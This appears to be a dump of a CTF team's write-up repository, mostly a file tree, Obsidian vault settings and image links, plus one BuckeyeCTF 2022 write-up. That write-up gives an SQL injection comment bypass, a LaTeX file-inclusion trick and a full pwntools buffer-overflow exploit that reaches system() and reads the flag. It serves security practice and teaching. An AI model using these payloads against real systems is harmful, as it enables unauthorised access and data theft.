├── 2022 ├── BuckeyeCTF 2022 │ ├── Pasted image 20221107060238.png │ ├── Pasted image 20221107060336.png │ ├── Pasted image 20221107060408.png │ ├── Pasted image 20221107060436.png │ ├── Pasted image 20221107060452.png │ ├── Pasted image 20221107060800.png │ └── README.md ├── CJCTF 2022 Final │ ├── Pasted image 20221222211919.png │ ├── Pasted image 20221222211921.png │ ├── Pasted image 20221222211953.png │ ├── Pasted image 20221222212013.png │ ├── Pasted image 20221222212045.png │ ├── Pasted image 20221222212131.png │ ├── Pasted image 20221222212154.png │ ├── Pasted image 20221222212232.png │ ├── Pasted image 20221222212243.png │ ├── Pasted image 20221222212315.png │ ├── Pasted image 20221222214414.png │ ├── Pasted image 20221222214636.png │ ├── Pasted image 20221222215806.png │ └── README.md ├── CJCTF 2022 Quals │ └── TCP1P_CJ2022.pdf ├── Compfest14-quals │ └── COMPFEST14_TCP1P.pdf ├── Cyber Apocalypse CTF 2022 - Intergalactic Chase │ └── README.md ├── Cyberwariors-Hackathon-Quals │ ├── CyberHackathon_Proof_of_Concept_Babak_Penyisihan_Santri_Anime (1).pdf │ └── READMME.md ├── DiceCTF │ ├── crypto │ │ ├── kfb │ │ │ ├── flag.txt │ │ │ ├── server.py │ │ │ └── solve.py │ │ ├── obp │ │ │ ├── obp.output.txt │ │ │ └── solve.py │ │ └── pem │ │ │ ├── encrypted.bin │ │ │ ├── flag.txt │ │ │ ├── generate.py │ │ │ ├── privatekey.pem │ │ │ └── solve.py │ ├── rev │ │ ├── check │ │ │ ├── .gdb_history │ │ │ ├── challenge │ │ │ └── solve.py │ │ ├── slices │ │ │ └── solve.py │ │ └── super anti scalper solution │ │ │ └── solve.html │ └── web │ │ ├── inspect-me │ │ ├── README.md │ │ └── inspect-me.mc.ax.html │ │ ├── pastebin │ │ └── README.md │ │ ├── point │ │ ├── point.ipynb │ │ ├── point.main.go │ │ └── solve.py │ │ └── reverser │ │ ├── reverser.app.py │ │ └── solve.py ├── DownUnderCTF 2022 │ ├── Pasted image 20220925192012.png │ ├── Pasted image 20220925192200.png │ ├── Pasted image 20220925192221.png │ ├── Pasted image 20220925192245.png │ ├── Pasted image 20220925192305.png │ ├── 
Pasted image 20220925192349.png │ ├── Pasted image 20220925192359.png │ ├── Pasted image 20220925192410.png │ ├── Pasted image 20220925192451.png │ ├── Pasted image 20220925192503.png │ ├── Pasted image 20220925192528.png │ ├── Pasted image 20220925192546.png │ ├── Pasted image 20220925192621.png │ ├── Pasted image 20220925192703.png │ ├── Pasted image 20220925192712.png │ ├── Pasted image 20220925192904.png │ ├── Pasted image 20220925192923.png │ ├── Pasted image 20220925193009.png │ ├── Pasted image 20220925193231.png │ ├── Pasted image 20220925193444.png │ ├── Pasted image 20220925193527.png │ └── README.md ├── GoolgeCTF2022 │ └── README.md ├── MapleCTF 2022 │ ├── crypto │ │ └── brsaby │ │ │ ├── script.py │ │ │ └── solve.ipynb │ ├── pwn │ │ ├── README.md │ │ ├── terminal.png │ │ └── warmup1 │ │ │ ├── chal │ │ │ ├── flag.txt │ │ │ └── solve.py │ └── web │ │ ├── Bookstore │ │ ├── Solve.py │ │ └── bookstore.zip │ │ ├── Pickle Factory │ │ ├── pickle-factory.zip │ │ └── solve.py │ │ └── honksay │ │ ├── a.out │ │ ├── honksay.tar.gz │ │ ├── hosted │ │ ├── ._Dockerfile │ │ ├── ._app.js │ │ ├── ._goose.js │ │ ├── ._package-lock.json │ │ ├── ._package.json │ │ ├── ._public │ │ ├── Dockerfile │ │ ├── app.js │ │ ├── build.sh │ │ ├── goose.js │ │ ├── package-lock.json │ │ ├── package.json │ │ └── public │ │ │ ├── ._images │ │ │ └── images │ │ │ ├── ._goosevie.png │ │ │ └── goosevie.png │ │ └── solve.md ├── NCW2022 │ └── WU_NCW22_Anya Haha Inakute Sabishii.pdf ├── SECCON CTF 2022 Quals │ ├── Pasted image 20221113195707.png │ ├── Pasted image 20221113195729.png │ ├── Pasted image 20221113195754.png │ └── README.md ├── TCP1P-CTF-Bootcamp │ └── PWN │ │ ├── Pasted image 20221231091251.png │ │ └── README.md ├── annofest-2022 │ └── Penyisihan │ │ └── README.md ├── corCTF 2022 │ ├── babypwn │ │ ├── babypwn │ │ ├── get_libc.py │ │ ├── main │ │ │ ├── Dockerfile │ │ │ ├── babypwn │ │ │ ├── flag.txt │ │ │ ├── libc.so.6 │ │ │ └── run.sh │ │ └── solve.py │ └── whack-a-frog │ │ ├── 
solve.py │ │ ├── test │ │ └── whacking-the-froggers.pcap ├── csawctf-qual-2022 │ ├── Pasted image 20220912170611.png │ ├── Pasted image 20220912170634.png │ ├── Pasted image 20220912170647.png │ ├── Pasted image 20220912170726.png │ ├── Pasted image 20220912170742.png │ ├── Pasted image 20220912171239.png │ ├── Pasted image 20220912171311.png │ └── README.md ├── ctf.nullcon.net │ ├── Cloud 9*9 │ │ ├── README.md │ │ ├── access.py │ │ ├── flag4.txt │ │ ├── rce.py │ │ └── set.env.sh │ ├── Git To the Core │ │ ├── README.md │ │ ├── connect.py │ │ └── task.py │ ├── Unis Love Code │ │ ├── chall.py │ │ └── test.py │ └── jsonify │ │ ├── flag.txt │ │ ├── index.php │ │ ├── test.php │ │ └── test2.php ├── ctf.thefewchosen.com │ └── README.md ├── deadface-ctf │ ├── Pasted image 20221016084856.png │ ├── Pasted image 20221016084906.png │ ├── Pasted image 20221016084928.png │ ├── Pasted image 20221016085136.png │ ├── Pasted image 20221016085148.png │ ├── Pasted image 20221016085202.png │ ├── Pasted image 20221016085210.png │ ├── Pasted image 20221016085502.png │ ├── Pasted image 20221016085646.png │ ├── Pasted image 20221016090134.png │ ├── Pasted image 20221016090147.png │ ├── Pasted image 20221016090154.png │ ├── Pasted image 20221016090238.png │ ├── Pasted image 20221016090243.png │ ├── Pasted image 20221016090323.png │ └── README.md ├── gdg-algiers-ctf │ ├── Pasted image 20221010110356.png │ ├── Pasted image 20221010110402.png │ ├── Pasted image 20221010110408.png │ ├── Pasted image 20221010110505.png │ ├── Pasted image 20221010110510.png │ ├── Pasted image 20221010110604.png │ ├── Pasted image 20221010110608.png │ ├── Pasted image 20221010110728.png │ ├── Pasted image 20221010111105.png │ └── README.md ├── glacierctf-2022 │ ├── Pasted image 20221127092045.png │ ├── Pasted image 20221127092101.png │ ├── Pasted image 20221127092221.png │ ├── Pasted image 20221127092240.png │ ├── Pasted image 20221127092353.png │ ├── Pasted image 20221127093038.png │ ├── Pasted image 
20221127093304.png │ ├── Pasted image 20221127093345.png │ └── README.md ├── jade-ctf │ ├── Pasted image 20221023144928.png │ ├── Pasted image 20221023145014.png │ ├── Pasted image 20221023145032.png │ ├── Pasted image 20221023145105.png │ ├── Pasted image 20221023153937.png │ ├── Pasted image 20221023154016.png │ ├── Pasted image 20221023154059.png │ ├── Pasted image 20221023154120.png │ ├── Pasted image 20221023154451.png │ ├── Pasted image 20221023154508.png │ ├── Pasted image 20221023154544.png │ ├── Pasted image 20221023154728.png │ ├── Pasted image 20221023154928.png │ ├── Pasted image 20221023154942.png │ ├── Pasted image 20221023155120.png │ ├── Pasted image 20221023155211.png │ ├── Pasted image 20221023155218.png │ └── README.md ├── kitctfctf-2022 │ ├── Pasted image 20221211192759.png │ ├── Pasted image 20221211192912.png │ ├── Pasted image 20221211192926.png │ ├── Pasted image 20221211192941.png │ ├── Pasted image 20221211192953.png │ ├── Pasted image 20221211193146.png │ ├── Pasted image 20221211193234.png │ └── README.md ├── sekai-ctf │ ├── Pasted image 20221004173301.png │ ├── Pasted image 20221004173340.png │ └── README.md ├── square-ctf-2022 │ ├── Pasted image 20221121074934.png │ ├── Pasted image 20221121074939.png │ ├── Pasted image 20221121075018.png │ ├── Pasted image 20221121075102.png │ └── README.md ├── tangerang CTF │ ├── Pasted image 20220319104150.png │ ├── Pasted image 20220319174935.png │ ├── Pasted image 20220319174951.png │ ├── Pasted image 20220319180942.png │ ├── Pasted image 20220319194044.png │ ├── Pasted image 20220319194544.png │ ├── Pasted image 20220320063212.png │ ├── Pasted image 20220320065410.png │ ├── Pasted image 20220320102408.png │ ├── Pasted image 20220320103533.png │ └── README.md ├── web1.hsctf.com │ └── README.md └── x-mas-ctf-2022 │ ├── Pasted image 20221222205054.png │ ├── Pasted image 20221222205402.png │ ├── Pasted image 20221222205507.png │ ├── Pasted image 20221222205718.png │ ├── Pasted image 
20221222205819.png │ ├── Pasted image 20221222205926.png │ ├── Pasted image 20221222210046.png │ ├── Pasted image 20221222210140.png │ ├── Pasted image 20221222210201.png │ ├── Pasted image 20221222210316.png │ ├── Pasted image 20221222210324.png │ ├── Pasted image 20221223211635.png │ ├── Pasted image 20221223211710.png │ ├── Pasted image 20221223211742.png │ ├── Pasted image 20221223211801.png │ ├── Pasted image 20221223212147.png │ ├── Pasted image 20221223212155.png │ └── README.md ├── 2023 ├── 0xL4ughCTF 2023 │ └── README.md ├── ARACTF2023 │ └── README.md ├── BucketCtf 2023 │ └── README.md ├── ByuCtf-2023 │ └── README.md ├── Cursedctf-2023 │ └── README.md ├── DiceCTF-2023 │ ├── Pasted image 20230207164229.png │ ├── Pasted image 20230207164413.png │ ├── Pasted image 20230207164435.png │ └── README.md ├── HTB Cyber Apocalypse 2023 │ ├── Pasted image 20230324115213.png │ └── README.md ├── HackTMCTF-quals │ └── README.md ├── IdekCTF-2022 │ ├── Pasted image 20230116231049.png │ ├── Pasted image 20230116231114.png │ ├── Pasted image 20230116231338.png │ └── README.md ├── Joints Quals 2023 │ └── README.md ├── KalmarCTF-2023 │ └── README.md ├── Knightctf-2023 │ ├── Pasted image 20230122064030.png │ ├── Pasted image 20230122064152.png │ ├── Pasted image 20230122064305.png │ ├── Pasted image 20230122064318.png │ ├── Pasted image 20230122064420.png │ ├── Pasted image 20230122064435.png │ ├── Pasted image 20230122064452.png │ ├── Pasted image 20230122064534.png │ ├── Pasted image 20230122064618.png │ ├── Pasted image 20230122064721.png │ ├── Pasted image 20230122064755.png │ ├── Pasted image 20230122064820.png │ ├── Pasted image 20230122064919.png │ └── README.md ├── LACTF-2023 │ ├── Pasted image 20230214115929.png │ └── README.md ├── LineCTF 2023 │ └── README.md ├── Pragyan CTF 2023 │ └── README.md ├── Real-World-CTF │ ├── Pasted image 20230109172555.png │ └── README.md ├── RushCTF 2023 │ └── README.md ├── San-diego-ctf-2023 │ └── README.md ├── UMASSCTF 2023 │ └── 
README.md ├── UTCTF 2023 │ └── README.md ├── VU-Cyberthon-2023 │ └── README.md ├── WaniCtf 2023 │ └── README.md ├── Wrectit Quals 2023 │ └── README.md ├── angstromctf-2023 │ └── README.md ├── bbctf-2023 │ ├── Pasted image 20230206061956.png │ ├── Pasted image 20230206062058.png │ ├── Pasted image 20230206062127.png │ ├── Pasted image 20230206062218.png │ └── README.md ├── ctf-after-dark-winter-2023 │ └── README.md ├── damctf-2023 │ └── README.md ├── deadsec-ctf-2023 │ └── README.md ├── gray-cat-the-flag-2023-qualifier │ └── README.md ├── hackpack-ctf-2023 │ └── README.md ├── m0leConCTF-2023 │ └── README.md ├── nullcon HackIM CTF Berlin │ └── README.md ├── plaidCTF 2023 │ └── README.md ├── umdctf-2023 │ └── README.md └── wolvctf-2023 │ ├── Pasted image 20230323041112.png │ ├── Pasted image 20230323041128.png │ └── README.md ├── .obsidian ├── app.json ├── appearance.json ├── community-plugins.json ├── core-plugins-migration.json ├── core-plugins.json ├── graph.json ├── hotkeys.json ├── plugins │ ├── obsidian-dynamic-toc │ │ ├── main.js │ │ ├── manifest.json │ │ └── styles.css │ ├── obsidian-git │ │ ├── data.json │ │ ├── main.js │ │ ├── manifest.json │ │ └── styles.css │ └── obsidian-imgur-plugin │ │ ├── data.json │ │ ├── main.js │ │ └── manifest.json └── workspace.json └── README.md /.obsidian/app.json: -------------------------------------------------------------------------------- 1 | { 2 | "attachmentFolderPath": "./", 3 | "newLinkFormat": "relative", 4 | "useMarkdownLinks": true, 5 | "pdfExportSettings": { 6 | "pageSize": "Letter", 7 | "landscape": false, 8 | "margin": "0", 9 | "downscalePercent": 100 10 | } 11 | } -------------------------------------------------------------------------------- /.obsidian/appearance.json: -------------------------------------------------------------------------------- 1 | { 2 | "accentColor": "", 3 | "baseFontSize": 15 4 | } -------------------------------------------------------------------------------- 
/.obsidian/community-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "obsidian-dynamic-toc", 3 | "obsidian-git", 4 | "obsidian-imgur-plugin" 5 | ] -------------------------------------------------------------------------------- /.obsidian/core-plugins-migration.json: -------------------------------------------------------------------------------- 1 | { 2 | "file-explorer": true, 3 | "global-search": true, 4 | "switcher": true, 5 | "graph": true, 6 | "backlink": true, 7 | "outgoing-link": true, 8 | "tag-pane": true, 9 | "page-preview": true, 10 | "daily-notes": true, 11 | "templates": true, 12 | "note-composer": true, 13 | "command-palette": true, 14 | "slash-command": false, 15 | "editor-status": true, 16 | "starred": true, 17 | "markdown-importer": false, 18 | "zk-prefixer": false, 19 | "random-note": false, 20 | "outline": true, 21 | "word-count": true, 22 | "slides": false, 23 | "audio-recorder": false, 24 | "workspaces": false, 25 | "file-recovery": true, 26 | "publish": false, 27 | "sync": false, 28 | "canvas": true, 29 | "bookmarks": true 30 | } -------------------------------------------------------------------------------- /.obsidian/core-plugins.json: -------------------------------------------------------------------------------- 1 | [ 2 | "file-explorer", 3 | "global-search", 4 | "switcher", 5 | "graph", 6 | "backlink", 7 | "canvas", 8 | "outgoing-link", 9 | "tag-pane", 10 | "page-preview", 11 | "daily-notes", 12 | "templates", 13 | "note-composer", 14 | "command-palette", 15 | "editor-status", 16 | "bookmarks", 17 | "outline", 18 | "word-count", 19 | "file-recovery" 20 | ] -------------------------------------------------------------------------------- /.obsidian/graph.json: -------------------------------------------------------------------------------- 1 | { 2 | "collapse-filter": true, 3 | "search": "", 4 | "showTags": false, 5 | "showAttachments": false, 6 | "hideUnresolved": false, 7 | 
"showOrphans": true, 8 | "collapse-color-groups": true, 9 | "colorGroups": [], 10 | "collapse-display": true, 11 | "showArrow": false, 12 | "textFadeMultiplier": 0, 13 | "nodeSizeMultiplier": 1, 14 | "lineSizeMultiplier": 1, 15 | "collapse-forces": true, 16 | "centerStrength": 0.518713248970312, 17 | "repelStrength": 10, 18 | "linkStrength": 1, 19 | "linkDistance": 250, 20 | "scale": 0.6283605869744029, 21 | "close": false 22 | } -------------------------------------------------------------------------------- /.obsidian/hotkeys.json: -------------------------------------------------------------------------------- 1 | { 2 | "obsidian-dynamic-toc:dynamic-toc-insert-command": [ 3 | { 4 | "modifiers": [ 5 | "Mod" 6 | ], 7 | "key": "." 8 | } 9 | ], 10 | "obsidian-plugin-toc:create-toc-next-level": [], 11 | "obsidian-plugin-toc:create-toc": [ 12 | { 13 | "modifiers": [ 14 | "Mod" 15 | ], 16 | "key": "." 17 | } 18 | ] 19 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-dynamic-toc/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-dynamic-toc", 3 | "name": "Dynamic Table of Contents", 4 | "author": "aidurber", 5 | "description": "An Obsidian plugin to generate Tables of Contents that stay up to date with your document outline.", 6 | "minAppVersion": "0.11.0", 7 | "version": "0.0.27", 8 | "repo": "aidurber/obsidian-plugin-dynamic-toc" 9 | } 10 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-dynamic-toc/styles.css: -------------------------------------------------------------------------------- 1 | .is-live-preview .dynamic-toc>*{margin-top:0;margin-bottom:0}.is-live-preview .dynamic-toc>* br{display:none}.is-live-preview .dynamic-toc>*:first-child{margin-top:16px}.is-live-preview .dynamic-toc>*:last-child{margin-bottom:16px}.is-live-preview .dynamic-toc 
ul{white-space:normal}.is-live-preview .dynamic-toc ol{white-space:normal} 2 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "commitMessage": "vault backup: {{date}}", 3 | "commitDateFormat": "YYYY-MM-DD HH:mm:ss", 4 | "autoSaveInterval": 0, 5 | "autoPushInterval": 0, 6 | "autoPullInterval": 0, 7 | "autoPullOnBoot": false, 8 | "disablePush": false, 9 | "pullBeforePush": true, 10 | "disablePopups": false, 11 | "listChangedFilesInMessageBody": false, 12 | "showStatusBar": true, 13 | "updateSubmodules": false, 14 | "syncMethod": "merge", 15 | "customMessageOnAutoBackup": false, 16 | "autoBackupAfterFileChange": false, 17 | "treeStructure": false, 18 | "refreshSourceControl": true, 19 | "basePath": "", 20 | "differentIntervalCommitAndPush": false, 21 | "changedFilesInStatusBar": false, 22 | "showedMobileNotice": true, 23 | "refreshSourceControlTimer": 7000, 24 | "showBranchStatusBar": true, 25 | "setLastSaveToLastCommit": false, 26 | "submoduleRecurseCheckout": false, 27 | "gitDir": "", 28 | "showFileMenu": true, 29 | "autoCommitMessage": "vault backup: {{date}}" 30 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-git/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-git", 3 | "name": "Obsidian Git", 4 | "description": "Backup your vault with Git.", 5 | "isDesktopOnly": false, 6 | "fundingUrl": "https://ko-fi.com/vinzent", 7 | "js": "main.js", 8 | "version": "2.19.1" 9 | } 10 | -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-imgur-plugin/data.json: -------------------------------------------------------------------------------- 1 | { 2 | "uploadStrategy": "ANONYMOUS_IMGUR", 3 | "clientId": null, 4 | 
"showRemoteUploadConfirmation": false 5 | } -------------------------------------------------------------------------------- /.obsidian/plugins/obsidian-imgur-plugin/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "id": "obsidian-imgur-plugin", 3 | "name": "Imgur Plugin", 4 | "version": "2.2.1", 5 | "minAppVersion": "0.13.19", 6 | "description": "This plugin uploads images from your clipboard to imgur.com and embeds uploaded image to your note", 7 | "author": "Kirill Gavrilov", 8 | "authorUrl": "https://github.com/gavvvr", 9 | "isDesktopOnly": true 10 | } 11 | -------------------------------------------------------------------------------- /.obsidian/workspace.json: -------------------------------------------------------------------------------- 1 | { 2 | "main": { 3 | "id": "4c0409ed7591ba4c", 4 | "type": "split", 5 | "children": [ 6 | { 7 | "id": "294506181e74d78a", 8 | "type": "tabs", 9 | "children": [ 10 | { 11 | "id": "ea1298c9a2b7937d", 12 | "type": "leaf", 13 | "state": { 14 | "type": "markdown", 15 | "state": { 16 | "file": "2023/ByuCtf-2023/README.md", 17 | "mode": "source", 18 | "source": false 19 | } 20 | } 21 | }, 22 | { 23 | "id": "825932db43b069b6", 24 | "type": "leaf", 25 | "state": { 26 | "type": "markdown", 27 | "state": { 28 | "file": "README.md", 29 | "mode": "source", 30 | "source": false 31 | } 32 | } 33 | } 34 | ] 35 | } 36 | ], 37 | "direction": "vertical" 38 | }, 39 | "left": { 40 | "id": "4804650776430b5c", 41 | "type": "split", 42 | "children": [ 43 | { 44 | "id": "0e2ea75063aedbc8", 45 | "type": "tabs", 46 | "children": [ 47 | { 48 | "id": "dda2f2ac5d697884", 49 | "type": "leaf", 50 | "state": { 51 | "type": "file-explorer", 52 | "state": { 53 | "sortOrder": "alphabetical" 54 | } 55 | } 56 | }, 57 | { 58 | "id": "cea1a1732bbd4758", 59 | "type": "leaf", 60 | "state": { 61 | "type": "search", 62 | "state": { 63 | "query": "", 64 | "matchingCase": false, 65 | "explainSearch": false, 
66 | "collapseAll": false, 67 | "extraContext": false, 68 | "sortOrder": "alphabetical" 69 | } 70 | } 71 | }, 72 | { 73 | "id": "09aefc050bc2aa5a", 74 | "type": "leaf", 75 | "state": { 76 | "type": "starred", 77 | "state": {} 78 | } 79 | }, 80 | { 81 | "id": "4c3ed564f8b8a6db", 82 | "type": "leaf", 83 | "state": { 84 | "type": "bookmarks", 85 | "state": {} 86 | } 87 | } 88 | ] 89 | } 90 | ], 91 | "direction": "horizontal", 92 | "width": 300 93 | }, 94 | "right": { 95 | "id": "6b6ce11dc9cf1f82", 96 | "type": "split", 97 | "children": [ 98 | { 99 | "id": "c90deb156513a322", 100 | "type": "tabs", 101 | "children": [ 102 | { 103 | "id": "8b420389797f3889", 104 | "type": "leaf", 105 | "state": { 106 | "type": "backlink", 107 | "state": { 108 | "file": "2023/ByuCtf-2023/README.md", 109 | "collapseAll": false, 110 | "extraContext": false, 111 | "sortOrder": "alphabetical", 112 | "showSearch": false, 113 | "searchQuery": "", 114 | "backlinkCollapsed": false, 115 | "unlinkedCollapsed": true 116 | } 117 | } 118 | }, 119 | { 120 | "id": "427d1310fb19206a", 121 | "type": "leaf", 122 | "state": { 123 | "type": "outgoing-link", 124 | "state": { 125 | "file": "2023/ByuCtf-2023/README.md", 126 | "linksCollapsed": false, 127 | "unlinkedCollapsed": true 128 | } 129 | } 130 | }, 131 | { 132 | "id": "6d3b8cc745d5a2cc", 133 | "type": "leaf", 134 | "state": { 135 | "type": "tag", 136 | "state": { 137 | "sortOrder": "frequency", 138 | "useHierarchy": true 139 | } 140 | } 141 | }, 142 | { 143 | "id": "390839dfd0d0fbff", 144 | "type": "leaf", 145 | "state": { 146 | "type": "outline", 147 | "state": { 148 | "file": "2023/ByuCtf-2023/README.md" 149 | } 150 | } 151 | } 152 | ], 153 | "currentTab": 3 154 | } 155 | ], 156 | "direction": "horizontal", 157 | "width": 300 158 | }, 159 | "left-ribbon": { 160 | "hiddenItems": { 161 | "switcher:Open quick switcher": false, 162 | "graph:Open graph view": false, 163 | "canvas:Create new canvas": false, 164 | "daily-notes:Open today's daily note": 
false, 165 | "templates:Insert template": false, 166 | "command-palette:Open command palette": false 167 | } 168 | }, 169 | "active": "ea1298c9a2b7937d", 170 | "lastOpenFiles": [ 171 | "2023/deadsec-ctf-2023/README.md", 172 | "2023/ByuCtf-2023/README.md", 173 | "2023/ByuCtf-2023", 174 | "2023/gray-cat-the-flag-2023-qualifier/README.md", 175 | "2023/Untitled.md", 176 | "2023/deadsec-ctf-2023", 177 | "README.md", 178 | "2023/gray-cat-the-flag-2023-qualifier", 179 | "2023/m0leConCTF-2023/README.md", 180 | "2023/angstromctf-2023/README.md", 181 | "2023/m0leConCTF-2023", 182 | "some.md", 183 | "2023/San-diego-ctf-2023/README.md", 184 | "2023/San-diego-ctf-2023", 185 | "2023/WaniCtf 2023/README.md", 186 | "2023/WaniCtf 2023", 187 | "2023/umdctf-2023/README.md", 188 | "2023/umdctf-2023", 189 | "2023/hackpack-ctf-2023/README.md", 190 | "().md", 191 | "tmp.md", 192 | "Untitled.canvas", 193 | "Untitled", 194 | "2023/angstromctf-2023", 195 | "2023/plaidCTF 2023/README.md", 196 | "2023/plaidCTF 2023", 197 | "2023/Joints Quals 2023/README.md", 198 | "2023/LineCTF 2023/README.md", 199 | "2023/Wrectit Quals 2023/README.md", 200 | "2023/damctf-2023/README.md", 201 | "2023/BucketCtf 2023/README.md", 202 | "2023/Cursedctf-2023/README.md", 203 | "2023/wolvctf-2023/README.md", 204 | "2023/HTB Cyber Apocalypse 2023/README.md", 205 | "2023/UMASSCTF 2023/README.md", 206 | "2023/UMASC.md", 207 | "2023/HTB Cyber Apocalypse 2023/Pasted image 20230324115213.png", 208 | "2023/nullcon HackIM CTF Berlin/README.md", 209 | "2023/wolvctf-2023/Pasted image 20230323041128.png", 210 | "2023/wolvctf-2023/Pasted image 20230323041112.png", 211 | "2023/bbctf-2023/Pasted image 20230206062127.png", 212 | "2023/bbctf-2023/Pasted image 20230206062215.png", 213 | "2023/bbctf-2023/Pasted image 20230206062218.png" 214 | ] 215 | } -------------------------------------------------------------------------------- /2022/BuckeyeCTF 2022/Pasted image 20221107060238.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060238.png -------------------------------------------------------------------------------- /2022/BuckeyeCTF 2022/Pasted image 20221107060336.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060336.png -------------------------------------------------------------------------------- /2022/BuckeyeCTF 2022/Pasted image 20221107060408.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060408.png -------------------------------------------------------------------------------- /2022/BuckeyeCTF 2022/Pasted image 20221107060436.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060436.png -------------------------------------------------------------------------------- /2022/BuckeyeCTF 2022/Pasted image 20221107060452.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060452.png -------------------------------------------------------------------------------- /2022/BuckeyeCTF 2022/Pasted image 20221107060800.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/BuckeyeCTF 2022/Pasted image 20221107060800.png
--------------------------------------------------------------------------------
/2022/BuckeyeCTF 2022/README.md:
--------------------------------------------------------------------------------
# web
---
## Scanbook

In this challenge we are given the URL of a web app that stores notes and saves their data as QR codes. So we only need to generate a QR code containing the number 0 in CyberChef, https://gchq.github.io/CyberChef/#recipe=Generate_QR_Code(%27PNG%27,5,2,%27Medium%27)&input=MA, and upload it to the site. Yay, we get the flag.

## buckeyenotes

We are given a website that is vulnerable to SQL injection, and we are asked to retrieve a note belonging to a specific user.

We simply bypass the check using "brutusB3stNut9999'--"

The bypass uses an SQL comment.

## textual

The flag is known to be in the server's current directory. Because this app uses LaTeX, and LaTeX has a function for pulling in another LaTeX file, `\include`, we can use it to read the flag in the current directory.

## pong

In this challenge we are given a URL to a website that contains a ping-pong game.

The goal in this challenge is to beat our opponent. After looking at the source code with the developer tools, we learn that the game logic runs on the client, so we can change some of the game's parameters.
The index source code can be seen here: https://pastebin.com/vKbP48ZR

So to solve this challenge I changed the parameter bvx to 100, so that the ball goes into the opponent's goal and we win the game.

We continue from the breakpoint and, boom, we get the flag.

# pwn
---
## Samurai

We are given the source code, in which we need to make the variable outcome match the hex value 0x4774cc to get a shell.

```c
if(outcome == 0x4774cc) {
    char* finisher = malloc(8);
    scroll(txt[3]);
    fgets(finisher, 8, stdin);
    system(finisher);
}
```

exploit

```python
from pwn import *
import sys
from Crypto.Util.number import long_to_bytes

context.binary = exe = ELF(f"./samurai", checksec=False)
context.terminal = "konsole -e".split()
context.log_level = "INFO"
context.bits = 64
context.arch = "amd64"


def init():
    if args.RMT:
        p = remote(sys.argv[1], sys.argv[2])
    else:
        p = process()
    return Exploit(p), p


class Exploit:
    def __init__(self, p: process):
        self.p = p

    def debug(self, script=None):
        if not args.RMT:
            if script:
                attach(self.p, script)
            else:
                attach(self.p)

    def sendName(self, content):
        p = self.p
        p.sendline(content)

    def waitForName(self):
        p = self.p
        p.recvuntil(b"what was it again?")

def main():
    x, p = init()
    """
    Because the source code contains a line like the one below:

    strcpy(response + strlen(response) - 1, ".\n");

    we have to put a null byte at the start, so that the address we want to change
    is not overwritten by the newline.
    """
    pay = b"\x00"+b"A"*29
    pay += b"\xcc\x74\x47\x00"
    pay +=b"A"*2
    x.sendName(pay)
    x.debug("break *main+203\nc")
    x.waitForName()
    """

    char* finisher = malloc(8);

    we can only send 8 bytes,
    so we use the asterisk "*" to read the flag
    """
    p.sendline(b"cat f*")
    p.interactive()

if __name__=="__main__":
    main()
```

--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222211919.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222211919.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222211921.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222211921.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222211953.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222211953.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Final/Pasted image 20221222212013.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212013.png
--------------------------------------------------------------------------------
/2022/CJCTF 2022 Quals/TCP1P_CJ2022.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Quals/TCP1P_CJ2022.pdf
--------------------------------------------------------------------------------
/2022/Compfest14-quals/COMPFEST14_TCP1P.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/Compfest14-quals/COMPFEST14_TCP1P.pdf
--------------------------------------------------------------------------------
